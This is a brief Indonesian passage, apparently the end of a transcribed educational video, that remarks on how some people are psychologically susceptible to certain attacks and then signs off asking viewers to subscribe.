psikologinya mudahnya terkena untuk dampak serangan-serangan seperti ini. Seperti itu teman-teman, ya mungkin itu aja yang bisa gue sampaikan. Jangan lupa di subscribe ya. Happy learning buat teman-teman semua. Bye bye.